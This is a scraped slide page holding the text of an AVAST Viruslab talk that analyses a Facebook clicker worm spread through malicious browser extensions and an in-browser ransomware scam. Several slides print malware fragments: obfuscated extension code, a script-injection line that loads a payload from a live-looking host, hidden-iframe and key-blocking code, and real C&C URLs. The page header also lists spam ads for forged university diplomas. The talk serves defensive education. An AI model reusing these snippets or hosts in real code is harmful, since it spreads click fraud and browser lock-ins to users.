1.Wireless Communication System_Wireless communication is a broad term that i...
 
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
Internet of Things in Manufacturing: Revolutionizing Efficiency & Quality | C...
 
Latest trends in computer networking.pptx
Latest trends in computer networking.pptxLatest trends in computer networking.pptx
Latest trends in computer networking.pptx
 
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shopHistory+of+E-commerce+Development+in+China-www.cfye-commerce.shop
History+of+E-commerce+Development+in+China-www.cfye-commerce.shop
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
 
Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027Italy Agriculture Equipment Market Outlook to 2027
Italy Agriculture Equipment Market Outlook to 2027
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...guildmasters guide to ravnica Dungeons & Dragons 5...
guildmasters guide to ravnica Dungeons & Dragons 5...
 
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
一比一原版(CSU毕业证)加利福尼亚州立大学毕业证成绩单专业办理
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 
How to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptxHow to Use Contact Form 7 Like a Pro.pptx
How to Use Contact Form 7 Like a Pro.pptx
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
 
This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!This 7-second Brain Wave Ritual Attracts Money To You.!
This 7-second Brain Wave Ritual Attracts Money To You.!
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
 
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdfJAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
JAVIER LASA-EXPERIENCIA digital 1986-2024.pdf
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 

Where There's Money, There's Crime: Web-based Threats

  • 1. Web-based Threats Bezpečnostní hrozby na webu Jan Širmer Pavel Šrámek
  • 3. Cyber-security myths Which of these myths have you heard? • I can safely open this attachment because the e-mail came from my friend • I can protect myself from malware by not going on porn/warez sites • Malware is only a problem on Windows • Malware is created by teenage geeks simply for bragging rights • Malware is created by antivirus vendors 326. 8. 2017 AVAST Viruslab
  • 4. The crimeware business 426. 8. 2017 AVAST Viruslab
  • 5. The crimeware business Malware authors are in it for the money • LockScreens, FakeAVs and encrypting ransomware • Banking trojans • Phishing, Identity theft • Botnets offered as a service – Spam – DDoS – CPU power (bitcoin mining, hash cracking, …) All sold on black market 526. 8. 2017 AVAST Viruslab
  • 6. Traditional infection vectors The easiest way to infect a machine? Convince the user to run it himself! • social engineering Your second best bet? • zero day vulnerabilities – Java, Adobe reader, Flash • out-of-date and/or pirated OS installations • hacked websites = best free hosting  Commercial exploit kits 626. 8. 2017 AVAST Viruslab
  • 7. 726. 8. 2017 AVAST Viruslab Victim Compromised server Website content request Malicious JS vuln- check Get exploit code Malware C&C server Exploit + payloadinstall Malware communication Bot background service Traditional infection timeline
  • 8. The new option: in-browser malware Traditional attacks target a single OS platform (mostly Win32). How to attack all platforms at once? • Use the common denominator – HTML + JS, web browser • Rich JS API, have fast engines • JS-based extensions = additional surface • Attacks come from the web anyway 826. 8. 2017 AVAST Viruslab
  • 9. The new option: in-browser malware In-browser JS can do: • Click hijacking for Ad-click fraud • Worm-like spreading over social networks • Ransomware equivalent (browser lockup) • DDoS via AJAX • Even cryptocurrency mining 926. 8. 2017 AVAST Viruslab
  • 11. Click for me Click here! Click here! 26. 8. 2017 AVAST Viruslab 11
  • 12. Option A: Native executable clicker 26. 8. 2017 AVAST Viruslab 12
  • 13. Option B: Fake Flash player 26. 8. 2017 AVAST Viruslab 13
  • 14. Payloads 26. 8. 2017 AVAST Viruslab 14 BHO Win32 extension JavaScript-based extensions CRXXPI
  • 15. Payload in IE • Originally base64 obfuscated • Injecting BHO 26. 8. 2017 AVAST Viruslab 15
  • 16. Firefox plug-in Installation 26. 8. 2017 AVAST Viruslab 16
  • 18. this.prefService.savePrefFile(null); this.req("uri", "`||x2''zqfo8&em'b&x`x7}5", guid, 8);}}, http://likecyp.com/j.php?u=GUID&b=1&v=00001&r=RANDOM {this.req("buri", "lppt>++igq}em*gki+n*tlt;q9", g, inx);} http://videosnow1.asia/j.php?u=GUID&b=1&v=00001&r=RANDOM { xuri = this.dec(this.uri(m, uri), inx) + "" + g + "&b=1&v=k00001&r=" + Math.floor(Math.random() * 999999); } Dean unpacked 26. 8. 2017 AVAST Viruslab 18
  • 19. Changes in browser settings TestAddon.buri user set string lppt >++igg}em*gki+n*tlt;q9 TestAddon.ch default string TestAddon.date user set string 1340624313 TestAddon.guid user set string 3c94f90903f031a799162872a55742e8 TestAddon.int user set string 60 TestAddon.uri user set string ‘||x2””eakzg9:&i|”b&x’x7}5 Dropped URLs • http://likecyp.com/j.php?u=GUID&b=1&v=00001&r=RANDOM • http://videosnow1.asia/j.php?u=GUID&b=1&v=00001&r=RANDOM 26. 8. 2017 AVAST Viruslab 19
  • 20. The script trail document.createElement('script');s.type='text/javascr ipt';s.src='http://uhnm6.me/js_f.php?v=0.05a • Two variants of js_f.php‘s returned payload 1. Self-spreading clicker 2. Clicker only • Additional functionalities – Page Auto like – Get online friends – Solve captcha – Stealing FB credentials 26. 8. 2017 AVAST Viruslab 20
  • 21. Self-spreading malware • The script updates victim’s Facebook and twitter feeds by posting new status messages 26. 8. 2017 AVAST Viruslab 21
  • 22. var videos = new Array(10); videos[0] = Array("80", "Kirst*en. Dunst mastur*bating on hidden camera", "It happened in United Stateshotel", "http://bit.ly/MTfe4S", "http://i.imgur.com/NjZPU.jpg", "", "20", "friend", "327065014030715", "431402153539537", "AQBu92VH5GDqrJkp", "2309869772"); var flk = Array(); if ((1 == 1)) { var randomnumber = Math.floor(Math.random() * 100); if (randomnumber > 0) { ... Self-spreading malware 26. 8. 2017 AVAST Viruslab 22
  • 23. Injected iframe creation function createIframe(src) { var ifr = document.createElement("iframe"); ifr.setAttribute("src", src); ifr.style.position = "absolute"; ifr.style.top = "0"; ifr.style.left = "0"; ifr.style.width = "100%"; ifr.style.height = "100%"; document.body.appendChild(ifr) } function get_img_src(src, no) { x = src.getElementsByTagName("img"); return x[no].id } function make_dom(src) { var tempDiv = document.createElement("div"); tempDiv.innerHTML = src; return tempDiv } 26. 8. 2017 AVAST Viruslab 23
  • 24. Clicker • BHO, Firefox and Chrome payloads all contain a link to a site like http://resultsz.com/search/anticheat6.php?username =foreste • The site hosts a list of other sites used by all of those “clickers” for injecting hidden iframes into every visited site and earning money to the Blackhats. 26. 8. 2017 AVAST Viruslab 24
  • 26. FB Clicker: Attack vector 26. 8. 2017 AVAST Viruslab 26 Exploit: ID-10-T • Method: Social engineering (celebrities, user curiosity) • Target: Largest social network Technique: Impersonation • Common masquerade – Adobe Flash Player • Trained response to plugin installation prompts  A significant portion of users will not identify the scam
  • 27. FB Clicker: Technology 26. 8. 2017 AVAST Viruslab 27 Approach: Extension-based • Provides extensions for 3 major browsers • Functionality is the same Technology: Web-based where possible • IE uses native extensions (BHO = Win32 DLL) • FF and Chrome use JS-driven extensions • JavaScript code is shared  FF and Chrome attacks are OS-independent worms
  • 29. In-Browser Ransomware 26. 8. 2017 AVAST Viruslab 29
  • 30. In-Browser Ransomware 26. 8. 2017 AVAST Viruslab 30
  • 31. Geo-specific content 26. 8. 2017 AVAST Viruslab 31 function prepare_Frame(c) { ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "LEND/EN/alert.html"); ifrm.setAttribute("class", "frame"); ifrm.name = "iname"+c; ifrm.src = "LEND/EN/alert.html"; ifrm.style.display = "none"; ifrm.style.width = 0+"px"; ifrm.style.height = 0+"px"; return ifrm; //document.body.appendChild(ifrm); }
  • 32. Self-protection attempt function catchControlKeys(event) { var code = event.keyCode ? event.keyCode : event.which ? event.which : null; if (event.ctrlKey) { if (code == 117) return false; // Ctrl + u if (code == 85) return false; // Ctrl + U if (code == 99) return false; // Ctrl + c if (code == 67) return false; // Ctrl + C if (code == 97) return false; // Ctrl + a if (code == 65) return false; // Ctrl + A } } 26. 8. 2017 AVAST Viruslab 32
  • 33. Close Prevention 26. 8. 2017 AVAST Viruslab 33
  • 34. What’s happening on the background? Repeatedattemptstoclose 26. 8. 2017 AVAST Viruslab 34
  • 35. Malicious site examples 26. 8. 2017 AVAST Viruslab 35
  • 36. Spread 26. 8. 2017 AVAST Viruslab 36
  • 38. In-browser ransomware: Attack vector 26. 8. 2017 AVAST Viruslab 38 Exploit: ID-10-T again • Method: poisoned links • Target: people looking for illegal content Technique: Scares, threats, lies • Proven direct monetization scheme • Some panicked / guilty users really pay  Ransomware like any other, just faster-acting
  • 39. In-browser ransomware: Technology 26. 8. 2017 AVAST Viruslab 39 Approach: Pure webpage (HTML + JS) • Server-side static pages + payment form • Later versions: Geo-targeted content Technology: JS only (client-side) • Event swallowing = lock-like functionality • Rudimentary self-protection • Easily evaded by power users (who won’t pay anyway)  Direct monetization in any modern browser!
  • 41. Reiteration Cybersecurity scene • Financially motivated criminals • Low awareness of inner workings Facebook clicker • Worm-like spreading behavior in JS • Malicious extensions In-browser ransomware • Existing formula, new implementation • Truly cross-platform 4126. 8. 2017 AVAST Viruslab
  • 42. Final thoughts: Know your foe • Bad guys will take advantage of anything • Everyone with a browser is a potential target • Average Joe’s devices have a value if compromised Web tech can be abused • Cross-platform code allows cross-platform malware • JavaScript can do a lot • Not traditional exploitation, lower security measures  Learn which kinds of attacks are possible, educate others 4226. 8. 2017 AVAST Viruslab
  • 43. EOF Join the discussion with AVAST developers Follow us at Twitter and G+ @avast_devs #AVASTdevs

Editor's Notes

  1. There are two scenarios. The first one is simple executable clicker and second one is a
  2. 1)User click on Kirsten’s video 2)There is a malware 3)Malware secretly inject user’s PC 4)Malware communicate with C&C where receive a list of sites where to click 5)Malware clicks on received sites 6)Bad guy receive money
  3. Inside jstest.js are many links to different sites that are visited by user’s browser and the attacker gains money from clicks.
  4. Buri is link to likecyp Uri is fallback link